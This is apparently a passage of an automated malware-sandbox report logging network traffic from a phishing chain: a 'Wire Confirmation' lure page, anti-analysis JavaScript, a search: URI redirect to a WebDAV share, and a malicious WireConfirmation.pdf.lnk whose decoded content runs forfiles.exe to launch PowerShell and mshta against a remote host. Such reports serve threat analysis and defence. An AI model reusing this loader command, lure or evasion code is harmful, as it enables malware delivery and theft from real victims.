3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 6c 6f 63 6b 65 6e 74 72 79 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 65 78 63 6c 75 73 69 76 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 44 3a 77 72 69 74 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 44 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 2f 44 3a 70 72 6f 70 3e 3c 44 3a 73 74 61 74 75 73 3e 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 3c 2f 44 3a 73 74 61 74 75 73 3e 3c 2f 44 3a 70 72 6f 70 73 74 61 74 3e 3c 2f 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 57 69 72 65 25 32 30 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 2f 57 69 72 65 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 2e 70 64 66 2e 6c 6e 6b 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 67 65 74 65 74 61 67 3e 22 31 37 63 36 34 37 63 66 35 30 63 35 65 30 30 30 38 34 61 22 3c 2f 44 3a 67 65 74 65 74 61 67 3e 3c 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 6c 6f 63 6b 65 6e 74 72 79 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 65 78 63 6c 75 73 69 76 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 44 3a 77 72 69 74 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 44 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 57 69 72 65 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 2e 70 64 66 2e 6c 6e 6b 3c 2f 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 32 31 32 32 3c 2f 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 3c 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 53 75 6e 2c 20 31 34 20 41 70 72 20 32 30 32 34 20 32 33 3a 30 31 3a 30 34 20 47 4d 54 3c 2f 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 44 3a 67 65 74 63 6f 6e 74 65 6e 74 74 79 70 65 3e 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 3c 2f 44 3a 67 65 74 63 6f 6e 74 65 6e 74 74 79 70 65 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 2f 44 3a 70 72 6f 70 3e 3c 44 3a 73 74 61 74 75 73 3e 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 3c 2f 44 3a 73 74 61 74 75 73 3e 3c 2f 44 3a 70 72 6f 70 73 74 61 74 3e 3c 2f 44 3a 72 65 73 70 6f 6e
                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/Wire%20Confirmation/</D:href><D:propstat><D:prop><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype><D:displayname>Wire Confirmation</D:displayname><D:getlastmodified>Sun, 14 Apr 2024 23:02:07 GMT</D:getlastmodified><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response><D:response><D:href>/Wire%20Confirmation/WireConfirmation.pdf.lnk</D:href><D:propstat><D:prop><D:getetag>"17c647cf50c5e00084a"</D:getetag><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:displayname>WireConfirmation.pdf.lnk</D:displayname><D:getcontentlength>2122</D:getcontentlength><D:getlastmodified>Sun, 14 Apr 2024 23:01:04 GMT</D:getlastmodified><D:getcontenttype>application/octet-stream</D:getcontenttype><D:resourcetype></D:resourcetype></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:respon
                      Apr 16, 2024 16:26:20.199985981 CEST19INData Raw: 73 65 3e 3c 2f 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 3e
                      Data Ascii: se></D:multistatus>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.44976189.23.107.24080
                      TimestampBytes transferredDirectionData
                      Apr 16, 2024 16:26:20.419140100 CEST215OUTGET /Wire%20Confirmation/WireConfirmation.pdf.lnk HTTP/1.1
                      Cache-Control: no-cache
                      Connection: Keep-Alive
                      Pragma: no-cache
                      User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
                      translate: f
                      Host: 89.23.107.240
                      Apr 16, 2024 16:26:20.633470058 CEST727INHTTP/1.1 200 OK
                      Accept-Ranges: bytes
                      Content-Length: 2122
                      Content-Type: application/octet-stream
                      Etag: "17c647cf50c5e00084a"
                      Last-Modified: Sun, 14 Apr 2024 23:01:04 GMT
                      Date: Tue, 16 Apr 2024 14:26:20 GMT
                      Data Raw: 4c 00 00 00 01 14 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 ef 40 00 00 20 00 00 00 70 e1 56 19 e2 43 d7 01 70 e1 56 19 e2 43 d7 01 70 e1 56 19 e2 43 d7 01 00 a2 00 00 0d 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 01 14 00 1f 50 e0 4f d0 20 ea 3a 69 10 a2 d8 08 00 2b 30 30 9d 19 00 2f 43 3a 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 00 31 00 00 00 00 00 85 58 b9 71 10 00 57 69 6e 64 6f 77 73 00 40 00 09 00 04 00 ef be a8 52 da 40 85 58 b9 71 2e 00 00 00 12 02 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 89 69 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 00 00 16 00 5a 00 31 00 00 00 00 00 85 58 bd 7e 10 00 53 79 73 74 65 6d 33 32 00 00 42 00 09 00 04 00 ef be a8 52 da 40 85 58 bd 7e 2e 00 00 00 d6 0c 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 c3 1b 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 00 00 18 00 66 00 32 00 00 a2 00 00 a8 52 c0 41 20 00 66 6f 72 66 69 6c 65 73 2e 65 78 65 00 00 4a 00 09 00 04 00 ef be a8 52 c0 41 a8 52 c0 41 2e 00 00 00 ab 9b 00 00 00 00 01 00 00 00 00 00 88 00 00 00 00 00 00 00 00 00 90 f2 25 00 66 00 6f 00 72 00 66 00 69 00 6c 00 65 00 73 00 2e 00 65 00 78 00 65 00 00 00 1c 00 00 00 4f 00 00 00 1c 00 00 00 01 00 00 00 1c 00 00 00 2d 00 00 00 00 00 00 00 4e 00 00 00 11 00 00 00 03 00 00 00 97 a6 f1 76 10 00 00 00 00 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 74 65 6d 33 32 5c 66 6f 72 66 69 6c 65 73 2e 65 78 65 00 00 19 00 57 00 69 00 72 00 65 00 20 00 43 00 6f 00 6e 00 66 00 69 00 72 00 6d 00 61 00 74 00
                      Data Ascii: LF@ pVCpVCpVCEPO :i+00/C:\V1XqWindows@R@Xq.^iWindowsZ1X~System32BR@X~.System32f2RA forfiles.exeJRARA.%forfiles.exeO-NvC:\Windows\System32\forfiles.exeWire Confirmat
                      Apr 16, 2024 16:26:20.633620977 CEST1289INData Raw: 69 00 6f 00 6e 00 20 00 52 00 65 00 63 00 65 00 69 00 70 00 74 00 26 00 2e 00 2e 00 5c 00 2e 00 2e 00 5c 00 2e 00 2e 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 5c 00 66 00 6f 00 72 00
                      Data Ascii: ion Receipt&..\..\..\Windows\System32\forfiles.exe|/p C:\Windows\System32 /m calc.exe /c "powershell . mshta http://34.201
                      Apr 16, 2024 16:26:20.633660078 CEST321INData Raw: 02 5d 4e b7 44 2e b1 ae 51 98 b7 dd 00 00 00 60 00 00 00 03 00 00 a0 58 00 00 00 00 00 00 00 77 69 6e 2d 38 76 66 30 37 37 6e 61 31 70 37 00 f6 4e 1d 3c d7 b2 ae 49 9b c6 78 31 08 40 90 13 58 04 87 41 ea e8 ee 11 bb 65 ba ff 35 a0 e3 85 f6 4e 1d
                      Data Ascii: ]ND.Q`Xwin-8vf077na1p7N<Ix1@XAe5N<Ix1@XAe51SPSXFL8C&mm-S-1-5-21-254917188-4217226013-2928493570-5


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      10192.168.2.44976289.23.107.24080
                      TimestampBytes transferredDirectionData
                      Apr 16, 2024 16:26:21.017472029 CEST191OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 57 69 72 65 25 32 30 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 2f 54 68 75 6d 62 73 2e 64 62 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65
                      Data Ascii: PROPFIND /Wire%20Confirmation/Thumbs.db HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: 89.23.107.240
                      Apr 16, 2024 16:26:21.231455088 CEST132INHTTP/1.1 404 Not Found
                      Date: Tue, 16 Apr 2024 14:26:21 GMT
                      Content-Length: 9
                      Content-Type: text/plain; charset=utf-8
                      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
                      Data Ascii: Not Found


                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.449737104.21.39.1454431508C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-04-16 14:25:24 UTC678OUTGET /van-chuyen-giao-nhan/ HTTP/1.1
                      Host: tragiangoc.com
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-04-16 14:25:24 UTC629INHTTP/1.1 200 OK
                      Date: Tue, 16 Apr 2024 14:25:24 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Last-Modified: Sun, 14 Apr 2024 23:36:54 GMT
                      Accept-Ranges: bytes
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F24IoALFF%2BpXx1dOEil7pPj1PKoZzXhx47rgNzrrBvDP%2BNxgnNpOtYuKAc6RJM7wKwLx2c6QxJ66g6ASrEoTvuTRpjtl0FI%2BzHg0NnLT58lPaamWckjbSXoAy7IJ0BfylQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8754d82f79c56745-ATL
                      alt-svc: h3=":443"; ma=86400
                      2024-04-16 14:25:24 UTC740INData Raw: 32 34 63 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6d 61 67 65 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 63 61 63 68 65 2c 20 6e 6f 74 72 61 6e 73 6c 61 74 65 2c 20 6e 6f 79 61 63 61 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65
                      Data Ascii: 24c9<!DOCTYPE html><html lang="en"><head> <meta name="robots" content="noimageindex, nofollow, nosnippet, noindex, noarchive, nocache, notranslate, noyaca"> <meta http-equiv="Content-Type" content="text/html; charset=us-ascii"> <title
                      2024-04-16 14:25:24 UTC1369INData Raw: 78 65 63 75 74 6f 72 22 2c 20 22 24 77 64 63 5f 61 73 64 6a 66 6c 61 73 75 74 6f 70 66 68 76 63 5a 4c 6d 63 66 6c 5f 22 2c 20 22 5f 5f 6c 61 73 74 57 61 74 69 72 41 6c 65 72 74 22 2c 20 22 5f 5f 6c 61 73 74 57 61 74 69 72 43 6f 6e 66 69 72 6d 22 2c 20 22 5f 5f 6c 61 73 74 57 61 74 69 72 50 72 6f 6d 70 74 22 2c 20 22 24 63 68 72 6f 6d 65 5f 61 73 79 6e 63 53 63 72 69 70 74 49 6e 66 6f 22 2c 20 22 24 63 64 63 5f 61 73 64 6a 66 6c 61 73 75 74 6f 70 66 68 76 63 5a 4c 6d 63 66 6c 5f 22 2c 20 22 5f 5f 77 65 62 64 72 69 76 65 72 5f 65 76 61 6c 75 61 74 65 22 2c 20 22 5f 5f 73 65 6c 65 6e 69 75 6d 5f 65 76 61 6c 75 61 74 65 22 2c 20 22 5f 5f 77 65 62 64 72 69 76 65 72 5f 73 63 72 69 70 74 5f 66 75 6e 63 74 69 6f 6e 22 2c 20 22 5f 5f 77 65 62 64 72 69 76 65 72 5f
                      Data Ascii: xecutor", "$wdc_asdjflasutopfhvcZLmcfl_", "__lastWatirAlert", "__lastWatirConfirm", "__lastWatirPrompt", "$chrome_asyncScriptInfo", "$cdc_asdjflasutopfhvcZLmcfl_", "__webdriver_evaluate", "__selenium_evaluate", "__webdriver_script_function", "__webdriver_
                      2024-04-16 14:25:24 UTC1369INData Raw: 74 74 65 22 2c 20 22 70 75 70 70 65 74 65 65 72 22 2c 20 22 42 75 66 66 65 72 22 2c 20 22 5f 70 68 61 6e 74 6f 6d 22 2c 20 22 5f 5f 6e 69 67 68 74 6d 61 72 65 22 2c 20 22 5f 73 65 6c 65 6e 69 75 6d 22 2c 20 22 63 61 6c 6c 50 68 61 6e 74 6f 6d 22 2c 20 22 43 79 70 72 65 73 73 22 2c 20 22 63 61 6c 6c 53 65 6c 65 6e 69 75 6d 22 2c 20 22 5f 53 65 6c 65 6e 69 75 6d 5f 49 44 45 5f 52 65 63 6f 72 64 65 72 22 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 74 20 64 6f 63 75 6d 65 6e 74 53 65 61 72 63 68 4b 65 79 73 20 3d 20 5b 22 64 72 69 76 65 72 22 2c 20 22 77 65 62 64 72 69 76 65 72 22 2c 20 22 6d 61 72 69 6f 6e 65 74 74 65 22 2c 20 22 73 65 6c 65 6e 69 75 6d 22 2c 20 22 70 68 61 6e 74 6f 6d 22 2c 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72
                      Data Ascii: tte", "puppeteer", "Buffer", "_phantom", "__nightmare", "_selenium", "callPhantom", "Cypress", "callSelenium", "_Selenium_IDE_Recorder"]; let documentSearchKeys = ["driver", "webdriver", "marionette", "selenium", "phantom",]; for
                      2024-04-16 14:25:24 UTC1369INData Raw: 75 74 65 22 5d 28 22 77 65 62 64 72 69 76 65 72 22 29 29 20 72 65 74 75 72 6e 20 74 72 75 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 77 69 6e 64 6f 77 5b 22 64 6f 63 75 6d 65 6e 74 22 5d 5b 22 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 22 5d 5b 22 67 65 74 41 74 74 72 69 62 75 74 65 22 5d 28 22 64 72 69 76 65 72 22 29 29 20 72 65 74 75 72 6e 20 74 72 75 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 77 69 6e 64 6f 77 5b 22 64 6f 63 75 6d 65 6e 74 22 5d 5b 22 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 22 5d 5b 22 67 65 74 41 74 74 72 69 62 75 74 65 22 5d 28 22 67 65 63 6b 6f 64 72 69 76 65 72 22 29 29 20 72 65 74 75 72 6e 20 74 72 75 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 77 69 6e 64 6f 77 5b 22 64 6f
                      Data Ascii: ute"]("webdriver")) return true; if (window["document"]["documentElement"]["getAttribute"]("driver")) return true; if (window["document"]["documentElement"]["getAttribute"]("geckodriver")) return true; if (window["do
                      2024-04-16 14:25:24 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 65 2e 63 74 72 6c 4b 65 79 20 26 26 20 65 2e 6b 65 79 43 6f 64 65 20 3d 3d 3d 20 22 45 22 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 65 2e 63 74 72 6c 4b 65 79 20 26 26 20 65 2e 73 68 69 66 74 4b 65 79 20 26 26 20 65 2e 6b 65 79 43 6f 64 65 20 3d 3d 3d 20 22 49 22 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72
                      Data Ascii: return false } if (e.ctrlKey && e.keyCode === "E".charCodeAt(0)) { return false } if (e.ctrlKey && e.shiftKey && e.keyCode === "I".charCodeAt(0)) { retur
                      2024-04-16 14:25:24 UTC1369INData Raw: 20 74 79 70 65 6f 66 20 69 74 65 6d 20 21 3d 3d 20 22 73 74 72 69 6e 67 22 20 3f 20 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 69 74 65 6d 29 20 3a 20 69 74 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 76 61 6c 75 65 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 76 61 6c 75 65 20 3d 3d 3d 20 22 6f 62 6a 65 63 74 22 20 26 26 20 76 61 6c 75 65 20 21 3d 3d 20 6e 75 6c 6c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 0d 0a 20 20 20 20 20 20 20 20 20
                      Data Ascii: typeof item !== "string" ? JSON.stringify(item) : item; try { value = JSON.parse(value); return typeof value === "object" && value !== null } catch (e) { return false
                      2024-04-16 14:25:24 UTC1369INData Raw: 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 65 78 61 6d 70 6c 65 2e 63 6f 6d 27 2f 3e 0d 0a 20 20 20 20 3c 2f 6e 6f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 6e 6f 66 72 61 6d 65 73 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 65 78 61 6d 70 6c 65 2e 63 6f 6d 27 2f 3e 0d 0a 20 20 20 20 3c 2f 6e 6f 66 72 61 6d 65 73 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 65 6e 63 72 79 70 74 20 6c 69 6e 6b 20 74 6f 20 62 61 73 65 36 34
                      Data Ascii: <meta http-equiv='refresh' content='0;url=https://example.com'/> </noscript> <noframes> <meta http-equiv='refresh' content='0;url=https://example.com'/> </noframes></head><body> <script> // encrypt link to base64
                      2024-04-16 14:25:24 UTC471INData Raw: 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 6b 65 79 64 6f 77 6e 27 2c 20 28 65 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 65 2e 63 74 72 6c 4b 65 79 20 26 26 20 65 2e 6b 65 79 20 3d 3d 20 27 70 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 2e 63 61 6e 63 65 6c 42 75 62 62 6c 65 20 3d 20 74 72 75 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 2e 73 74 6f 70 49 6d 6d 65 64 69 61 74 65 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 41 63 63 65
                      Data Ascii: ventListener('keydown', (e) => { if (e.ctrlKey && e.key == 'p') { e.cancelBubble = true; e.preventDefault(); e.stopImmediatePropagation(); } }); function Acce
                      2024-04-16 14:25:24 UTC5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.449740104.18.3.354431508C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-04-16 14:25:25 UTC740OUTGET /WireConfirmation_2004.10.2024.html HTTP/1.1
                      Host: pub-6d8650014e23489d8c6e14ca9312426a.r2.dev
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-Dest: document
                      Referer: https://tragiangoc.com/
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-04-16 14:25:25 UTC282INHTTP/1.1 200 OK
                      Date: Tue, 16 Apr 2024 14:25:25 GMT
                      Content-Type: text/html
                      Content-Length: 1435
                      Connection: close
                      Accept-Ranges: bytes
                      ETag: "47114eabb690f96fd59ee4c17dddcde0"
                      Last-Modified: Sun, 14 Apr 2024 23:29:30 GMT
                      Server: cloudflare
                      CF-RAY: 8754d836fa05ad94-ATL
                      2024-04-16 14:25:25 UTC1087INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 55 52 4c 3d 73 65 61 72 63 68 3a 71 75 65 72 79 3d 57 69 72 65 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 2e 70 64 66 26 61 6d 70 3b 63 72 75 6d 62 3d 6c 6f 63 61 74 69 6f 6e 3a 5c 5c 38 39 2e 32 33 2e
                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="refresh" content="0; URL=search:query=WireConfirmation.pdf&amp;crumb=location:\\89.23.
                      2024-04-16 14:25:25 UTC348INData Raw: 69 72 6d 61 74 69 6f 6e 5c 26 61 6d 70 3b 64 69 73 70 6c 61 79 6e 61 6d 65 3d 57 69 72 65 20 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 22 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 41 43 43 45 53 53 20 48 45 52 45 20 54 4f 20 52 45 56 49 45 57 20 46 55 4c 4c 20 44 4f 43 55 4d 45 4e 54 20 4e 4f 57 0d 0a 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 3c 2f 70 3e 0d 0a 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 43 6f 72 64 69 61 6c 65 6d 65 6e 74 2c 3c 62 72 2f 3e 0d 0a 20 20 20 20 20 20 20 20 57 69 74 68 20 6b 69 6e 64 20 72 65 67 61 72 64 73 2c 3c 62 72 2f 3e 20 0d 0a 20 20 20 20 20 20 20 20 3c 62 3e 4a 6f 68 6e 20
                      Data Ascii: irmation\&amp;displayname=Wire Confirmation" > ACCESS HERE TO REVIEW FULL DOCUMENT NOW </a> </p> <p style="font-size: 24px; font-weight: 400;"> Cordialement,<br/> With kind regards,<br/> <b>John


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.449741104.18.3.354431508C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-04-16 14:25:26 UTC676OUTGET /favicon.ico HTTP/1.1
                      Host: pub-6d8650014e23489d8c6e14ca9312426a.r2.dev
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: no-cors
